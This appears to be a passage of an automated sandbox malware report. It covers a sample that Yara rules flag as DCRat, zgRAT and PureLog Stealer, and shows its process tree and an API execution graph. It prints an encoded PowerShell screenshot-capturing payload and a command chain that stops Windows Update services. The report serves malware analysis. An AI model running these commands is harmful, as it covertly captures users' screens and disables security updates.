                                                                  Start time:22:27:18
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\getmac.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:getmac
                                                                  Imagebase:0x7ff704f20000
                                                                  File size:90'112 bytes
                                                                  MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:67
                                                                  Start time:22:27:18
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\tree.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:tree /A /F
                                                                  Imagebase:0x7ff691a50000
                                                                  File size:20'992 bytes
                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:68
                                                                  Start time:22:27:18
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:69
                                                                  Start time:22:27:18
                                                                  Start date:31/07/2024
                                                                  Path:C:\Recovery\HpQPPZazcv.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Recovery\HpQPPZazcv.exe
                                                                  Imagebase:0x860000
                                                                  File size:3'720'704 bytes
                                                                  MD5 hash:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000045.00000002.2932877358.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000045.00000002.2932877358.0000000003144000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000045.00000002.2932877358.0000000003549000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\HpQPPZazcv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\HpQPPZazcv.exe, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 92%, ReversingLabs
                                                                  Has exited:false

                                                                  Target ID:70
                                                                  Start time:22:27:19
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:71
                                                                  Start time:22:27:19
                                                                  Start date:31/07/2024
                                                                  Path:C:\Recovery\HpQPPZazcv.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Recovery\HpQPPZazcv.exe
                                                                  Imagebase:0x90000
                                                                  File size:3'720'704 bytes
                                                                  MD5 hash:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:72
                                                                  Start time:22:27:19
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:73
                                                                  Start time:22:27:19
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:74
                                                                  Start time:22:27:19
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:sc stop UsoSvc
                                                                  Imagebase:0x7ff7f8d70000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:75
                                                                  Start time:22:27:19
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:sc stop WaaSMedicSvc
                                                                  Imagebase:0x7ff7f8d70000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:76
                                                                  Start time:22:27:19
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.cmdline"
                                                                  Imagebase:0x7ff791cd0000
                                                                  File size:2'759'232 bytes
                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:77
                                                                  Start time:22:27:19
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:sc stop wuauserv
                                                                  Imagebase:0x7ff7f8d70000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:78
                                                                  Start time:22:27:20
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:sc stop bits
                                                                  Imagebase:0x7ff7f8d70000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:79
                                                                  Start time:22:27:20
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC3.tmp" "c:\Users\user\AppData\Local\Temp\eodmidm4\CSC7CD01418C841459A9A462A9B35F4C645.TMP"
                                                                  Imagebase:0x7ff6e6930000
                                                                  File size:52'744 bytes
                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:83
                                                                  Start time:22:27:20
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:sc stop dosvc
                                                                  Imagebase:0x7ff7f8d70000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:106
                                                                  Start time:22:27:21
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                  Wow64 process (32bit):
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:
                                                                  Has administrator privileges:
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  Target ID:158
                                                                  Start time:22:27:58
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                  Wow64 process (32bit):
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:
                                                                  Has administrator privileges:
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:9.9%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:12.9%
                                                                    Total number of Nodes:1742
                                                                    Total number of Limit Nodes:44
                                                                    execution_graph 24315 daf6de 24329 daea83 _wcslen _wcsrchr 24315->24329 24317 daf717 24394 db10f9 24317->24394 24319 daf732 24320 daed57 SetWindowTextW 24320->24329 24326 daeb4b SetFileAttributesW 24327 daec05 GetFileAttributesW 24326->24327 24343 daeb65 __cftof _wcslen 24326->24343 24327->24329 24331 daec17 DeleteFileW 24327->24331 24329->24317 24329->24320 24329->24326 24335 daf73c 24329->24335 24340 daef75 SendMessageW 24329->24340 24344 dad41c 24329->24344 24363 dad5dd 24329->24363 24369 dac5dd GetCurrentDirectoryW 24329->24369 24370 d9dd18 24329->24370 24378 d9c3de 11 API calls 24329->24378 24379 d9c367 FindClose 24329->24379 24380 dad76e 76 API calls 3 library calls 24329->24380 24381 db66ae 24329->24381 24331->24329 24333 daec28 24331->24333 24375 d94c00 24333->24375 24334 daef35 GetDlgItem SetWindowTextW SendMessageW 24334->24329 24401 db13f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 24335->24401 24337 daf741 24340->24329 24341 daec5d MoveFileW 24341->24329 24342 daec75 MoveFileExW 24341->24342 24342->24329 24343->24327 24343->24329 24374 d9d8ac 51 API calls 2 library calls 24343->24374 24348 dad42e 24344->24348 24345 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24346 dad4f6 24345->24346 24346->24334 24347 dad4ba 24347->24345 24348->24347 24349 dad500 24348->24349 24402 db13f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 24349->24402 24351 dad505 24403 d91366 24351->24403 24354 dad574 24357 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24354->24357 24355 dad562 24355->24354 24359 dad56f 24355->24359 24360 dad583 GetDlgItemTextW 24355->24360 24356 dad5b5 SetDlgItemTextW 24356->24354 24358 dad5d4 24357->24358 24358->24334 24359->24354 24362 dad57a EndDialog 24359->24362 24413 da1421 82 API calls _wcslen 24360->24413 24362->24354 24364 dad5e7 24363->24364 24367 dad6df 24364->24367 24368 dad6bc ExpandEnvironmentStringsW 24364->24368 24365 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24366 dad6fc 24365->24366 24366->24329 24367->24365 24368->24367 24369->24329 24371 d9dd22 24370->24371 24372 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24371->24372 24373 d9dda6 24372->24373 24373->24329 24374->24343 24416 d94bd3 24375->24416 24378->24329 24379->24329 24380->24329 24382 dbbb34 24381->24382 24383 dbbb4c 24382->24383 24384 dbbb41 24382->24384 24386 dbbb54 24383->24386 24392 dbbb5d __dosmaperr 24383->24392 24495 dbbc8e 24384->24495 24387 dbbafa _free 20 API calls 24386->24387 24390 dbbb49 24387->24390 24388 dbbb62 24502 dbbc7b 20 API calls __dosmaperr 24388->24502 24389 dbbb87 HeapReAlloc 24389->24390 24389->24392 24390->24329 24392->24388 24392->24389 24503 dba2ec 7 API calls 2 library calls 24392->24503 24395 db1102 IsProcessorFeaturePresent 24394->24395 24396 db1101 24394->24396 24398 db1314 24395->24398 24396->24319 24506 db12d7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24398->24506 24400 db13f7 24400->24319 24401->24337 24402->24351 24404 d913c8 24403->24404 24405 d9136f 24403->24405 24415 da021d GetWindowLongW SetWindowLongW 24404->24415 24406 d913d5 24405->24406 24414 da0244 62 API calls 3 library calls 24405->24414 24406->24354 24406->24355 24406->24356 24409 d91391 24409->24406 24410 d913a4 GetDlgItem 24409->24410 24410->24406 24411 d913b4 24410->24411 24411->24406 24412 d913ba SetWindowTextW 24411->24412 24412->24406 24413->24359 24414->24409 24415->24406 24417 d94bea __vswprintf_c_l 24416->24417 24420 db8772 24417->24420 24423 db6835 24420->24423 24424 db685d 24423->24424 24425 db6875 24423->24425 24440 dbbc7b 20 API calls __dosmaperr 24424->24440 24425->24424 24427 db687d 24425->24427 24442 db6dd4 24427->24442 24429 db6862 24441 db6649 26 API calls ___std_exception_copy 24429->24441 24433 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24435 d94bf4 GetFileAttributesW 24433->24435 24434 db6905 24451 db7184 51 API calls 3 library calls 24434->24451 24435->24333 24435->24341 24438 db6910 24452 db6e57 20 API calls _free 24438->24452 24439 db686d 24439->24433 24440->24429 24441->24439 24443 db6df1 24442->24443 24444 db688d 24442->24444 24443->24444 24453 dbb9a5 GetLastError 24443->24453 24450 db6d9f 20 API calls 2 library calls 24444->24450 24446 db6e12 24473 dbbf86 38 API calls __cftof 24446->24473 24448 db6e2b 24474 dbbfb3 38 API calls __cftof 24448->24474 24450->24434 24451->24438 24452->24439 24454 dbb9bb 24453->24454 24455 dbb9c1 24453->24455 24475 dbd4ab 11 API calls 2 library calls 24454->24475 24459 dbba10 SetLastError 24455->24459 24476 dbd786 24455->24476 24459->24446 24460 dbb9db 24483 dbbafa 24460->24483 24462 dbb9f0 24462->24460 24464 dbb9f7 24462->24464 24490 dbb810 20 API calls __dosmaperr 24464->24490 24465 dbb9e1 24467 dbba1c SetLastError 24465->24467 24491 dbb584 38 API calls _abort 24467->24491 24468 dbba02 24470 dbbafa _free 20 API calls 24468->24470 24472 dbba09 24470->24472 24472->24459 24472->24467 24473->24448 24474->24444 24475->24455 24481 dbd793 __dosmaperr 24476->24481 24477 dbd7d3 24493 dbbc7b 20 API calls __dosmaperr 24477->24493 24478 dbd7be RtlAllocateHeap 24479 dbb9d3 24478->24479 24478->24481 24479->24460 24489 dbd501 11 API calls 2 library calls 24479->24489 24481->24477 24481->24478 24492 dba2ec 7 API calls 2 library calls 24481->24492 24484 dbbb2e __dosmaperr 24483->24484 24485 dbbb05 RtlFreeHeap 24483->24485 24484->24465 24485->24484 24486 dbbb1a 24485->24486 24494 dbbc7b 20 API calls __dosmaperr 24486->24494 24488 dbbb20 GetLastError 24488->24484 24489->24462 24490->24468 24492->24481 24493->24479 24494->24488 24496 dbbccc 24495->24496 24500 dbbc9c __dosmaperr 24495->24500 24505 dbbc7b 20 API calls __dosmaperr 24496->24505 24498 dbbcb7 RtlAllocateHeap 24499 dbbcca 24498->24499 24498->24500 24499->24390 24500->24496 24500->24498 24504 dba2ec 7 API calls 2 library calls 24500->24504 24502->24390 24503->24392 24504->24500 24505->24499 24506->24400 26627 da82d0 137 API calls __InternalCxxFrameHandler 26556 dad8c0 98 API calls 26557 db1cf3 20 API calls 26631 dbcaf0 71 API calls _free 26632 dc2ef0 IsProcessorFeaturePresent 26633 dbdaed 6 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 26558 d924e0 26 API calls std::bad_exception::bad_exception 25339 dadae0 25340 dadaf2 25339->25340 25341 d91366 66 API calls 25340->25341 25342 dadb45 25341->25342 25343 dadb76 25342->25343 25344 dadb5c 25342->25344 25345 dae250 25342->25345 25347 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25343->25347 25344->25343 25348 dadb6d 25344->25348 25349 dadbd0 25344->25349 25594 daf9ee 25345->25594 25351 dae555 25347->25351 25353 dadbad 25348->25353 25354 dadb71 25348->25354 25352 dadc63 GetDlgItemTextW 25349->25352 25357 dadbe6 25349->25357 25352->25353 25358 dadca0 25352->25358 25353->25343 25364 dadc94 KiUserCallbackDispatcher 25353->25364 25354->25343 25363 da0597 53 API calls 25354->25363 25355 dae26b SendMessageW 25356 dae279 25355->25356 25359 dae282 SendDlgItemMessageW 25356->25359 25360 dae293 GetDlgItem SendMessageW 25356->25360 25362 da0597 53 API calls 25357->25362 25361 dadcb5 GetDlgItem 25358->25361 25512 dadca9 25358->25512 25359->25360 25613 dac5dd GetCurrentDirectoryW 25360->25613 25367 dadcc9 SendMessageW SendMessageW 25361->25367 25368 dadcec SetFocus 25361->25368 25369 dadc03 SetDlgItemTextW 25362->25369 25370 dadb90 25363->25370 25364->25343 25366 dae2c3 GetDlgItem 25371 dae2e0 25366->25371 25372 dae2e6 SetWindowTextW 25366->25372 25367->25368 25373 dadcfc 25368->25373 25383 dadd08 25368->25383 25374 dadc0e 25369->25374 25637 d91273 6 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25370->25637 25371->25372 25614 dacb49 GetClassNameW 25372->25614 25378 da0597 53 API calls 25373->25378 25374->25343 25381 dadc1b GetMessageW 25374->25381 25376 dae196 25379 da0597 53 API calls 25376->25379 25382 dadd06 25378->25382 25385 dae1a6 SetDlgItemTextW 25379->25385 25381->25343 25387 dadc32 IsDialogMessageW 25381->25387 25514 daf7fc 25382->25514 25394 da0597 53 API calls 25383->25394 25384 dadb97 25384->25343 25388 dae531 SetDlgItemTextW 25384->25388 25390 dae1ba 25385->25390 25387->25374 25392 dadc41 TranslateMessage DispatchMessageW 25387->25392 25388->25343 25396 da0597 53 API calls 25390->25396 25392->25374 25398 dadd3f 25394->25398 25395 dadd77 25400 dadd96 25395->25400 25404 d9bccb 8 API calls 25395->25404 25435 dae1dd _wcslen 25396->25435 25397 dae331 25402 dae361 25397->25402 25406 da0597 53 API calls 25397->25406 25403 d94c00 _swprintf 51 API calls 25398->25403 25526 d9baf1 25400->25526 25401 daea07 121 API calls 25401->25397 25407 daea07 121 API calls 25402->25407 25463 dae419 25402->25463 25403->25382 25409 dadd8c 25404->25409 25411 dae344 SetDlgItemTextW 25406->25411 25412 dae37c 25407->25412 25408 dae4c0 25414 dae4c9 EnableWindow 25408->25414 25415 dae4d2 25408->25415 25409->25400 25413 dadd90 25409->25413 25419 da0597 53 API calls 25411->25419 25427 dae38e 25412->25427 25447 dae3b3 25412->25447 25639 dacebf 9 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25413->25639 25414->25415 25424 dae4ef 25415->25424 25648 d91323 GetDlgItem EnableWindow 25415->25648 25416 dae22e 25422 da0597 53 API calls 25416->25422 25417 daddaf GetLastError 25418 daddba 25417->25418 25537 dacbb6 SetCurrentDirectoryW 25418->25537 25420 dae358 SetDlgItemTextW 25419->25420 25420->25402 25422->25343 25425 dae516 25424->25425 25436 dae50e SendMessageW 25424->25436 25425->25343 25438 da0597 53 API calls 25425->25438 25426 daddce 25430 dadde5 25426->25430 25431 daddd7 GetLastError 25426->25431 25646 dabe55 31 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25427->25646 25428 dae40c 25432 daea07 121 API calls 25428->25432 25437 dade5c 25430->25437 25442 dade6b 25430->25442 25443 daddf5 GetTickCount 25430->25443 25431->25430 25432->25463 25434 dae4e5 25649 d91323 GetDlgItem EnableWindow 25434->25649 25435->25416 25441 da0597 53 API calls 25435->25441 25436->25425 25437->25442 25445 dae097 25437->25445 25438->25384 25439 dae3a7 25439->25447 25444 dae211 25441->25444 25449 dae03c 25442->25449 25451 dae032 25442->25451 25452 dade84 GetModuleFileNameW 25442->25452 25454 d94c00 _swprintf 51 API calls 25443->25454 25448 d94c00 _swprintf 51 API calls 25444->25448 25548 d91341 GetDlgItem ShowWindow 25445->25548 25446 dae4a1 25647 dabe55 31 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25446->25647 25447->25428 25455 daea07 121 API calls 25447->25455 25448->25416 25461 da0597 53 API calls 25449->25461 25451->25353 25451->25449 25640 da12bc 82 API calls 25452->25640 25457 dade12 25454->25457 25462 dae3e1 25455->25462 25456 dae0a7 25549 d91341 GetDlgItem ShowWindow 25456->25549 25538 d9b01e 25457->25538 25458 da0597 53 API calls 25458->25463 25460 dae4bd 25460->25408 25466 dae046 25461->25466 25462->25428 25467 dae3ea DialogBoxParamW 25462->25467 25463->25408 25463->25446 25463->25458 25465 dadeac 25469 d94c00 _swprintf 51 API calls 25465->25469 25470 d94c00 _swprintf 51 API calls 25466->25470 25467->25353 25467->25428 25468 dae0b1 25471 da0597 53 API calls 25468->25471 25472 dadece CreateFileMappingW 25469->25472 25474 dae064 25470->25474 25475 dae0bb SetDlgItemTextW 25471->25475 25477 dadf2c GetCommandLineW 25472->25477 25506 dadfa3 __InternalCxxFrameHandler 25472->25506 25484 da0597 53 API calls 25474->25484 25550 d91341 GetDlgItem ShowWindow 25475->25550 25480 dadf3d 25477->25480 25478 dadfae ShellExecuteExW 25503 dadfc9 25478->25503 25641 dad705 SHGetMalloc 25480->25641 25481 dade3f GetLastError 25482 dade4a 25481->25482 25486 d9af2f 80 API calls 25482->25486 25488 dae07e 25484->25488 25485 dae0cd SetDlgItemTextW GetDlgItem 25489 dae0ea GetWindowLongW SetWindowLongW 25485->25489 25490 dae102 25485->25490 25486->25437 25487 dadf59 25642 dad705 SHGetMalloc 25487->25642 25489->25490 25551 daea07 25490->25551 25494 dadf65 25643 dad705 SHGetMalloc 